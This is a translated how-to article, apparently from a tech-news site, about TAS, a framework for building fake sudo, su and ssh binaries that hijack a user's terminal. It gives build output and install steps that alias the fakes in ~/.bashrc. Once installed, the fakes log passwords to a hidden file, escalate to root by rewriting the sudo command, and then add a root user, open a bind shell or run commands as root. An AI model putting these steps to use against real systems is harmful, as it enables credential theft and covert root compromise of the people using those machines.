2025-03-29 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article is an example analysis of TAS, a lightweight framework for tty modification and fake-binary creation. It is fairly detailed and should be a useful reference; interested readers are encouraged to read on.
TAS is a lightweight framework that lets researchers easily modify a tty and build fake binaries.
The framework has three main functions: tas_execv, tas_forkpty and tas_tty_loop.
1. tas_execv: similar to execv, except that it does not re-execute the current code, which is very useful when building a fake binary.
2. tas_forkpty: the same as forkpty, except that it automatically fills in a custom structure; see the forkpty man page for details of the underlying operation.
3. tas_tty_loop: the function responsible for modifying the tty. Hook functions can be set on the input and output data, so the keystrokes typed by the user can be captured or the terminal output can be altered (see leet-shell).
For an in-depth understanding of how TAS works, look at the project's "tas/fakebins/fun" directory.
Forged code
By changing the PATH environment variable, or by using Bash aliases (or any other shell that supports aliases), a different program can be run in place of the one the user actually intended to run. In this way the target user's keystrokes can be captured, and the command line can be modified to change the behaviour of the original program.
Modifying the command line of certain programs, such as sudo and su, is what makes privilege escalation on the target device possible.
In order to make it easy for you to understand and use TAS, I have created three sample programs to demonstrate the functionality of the framework, namely sudo, su and generic-keylogger.
Generic-keylogger
Generic-keylogger, as its name suggests, can be used as a keylogger, and here we mainly use it to obtain passwords for programs like ssh and mysql.
Sudo/su
Of course, it can also be used as a keylogger, or you can run some functional modules with root permissions (by modifying the command line).
Command modification steps
First, the target user types and runs the following command:
sudo cmd
At this point, the command that actually runs is:
fakesudo cmd
fakesudo then executes the following command:
sudo fakesudo cmd
Once that command is running with root privileges, fakesudo creates a child process to execute its functional modules, and the main process runs the original command. Note that fakesudo only modifies the command if the user runs sudo cmd [args]; if additional sudo options are added, the command is not modified.
The situation with su is similar to that of sudo.
First, the target user types and runs the following command:
su -
At this point, the command that actually runs is:
fakesu -
fakesu then executes the following command:
su -c fakesu
Once that command is running with root privileges, fakesu creates a child process to execute its functional modules, and the main process runs bash -i.
Note: fakesu modifies the command only if the user runs su or su -. If additional su options are added, the command is not modified.
Function module
Currently, the tool has only the following three functional modules:
1. add-root-user: creates a root user with a password in /etc/passwd
2. bind-shell: listens for incoming connections and spawns a tty shell
3. system: executes commands with root permissions
Project download
Researchers can clone the project source code locally with the following command:
$ git clone https://github.com/hc0d3r/tas.git
Project build
First, we need to build the project base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
Next, we also need to run the following command to build sudo, su, and generic-keylogger:
$ make [target-bin]
Building the su sample:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
Using generic-keylogger to create a fake ssh
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
Installation:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
Demo:
Using the bind-shell module
Compile:
$ make sudo
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
Installation:
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
Demo:
Leet-shell
The leet-shell example shows how the tty output can be modified, here giving a bash session the look of a 1337 h5x0r:
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3!
[t3st@4lfh41m T4s]$ 3ch0 'l33t sh4ll 1s l33t!'
l33t sh4ll 1s l33t!!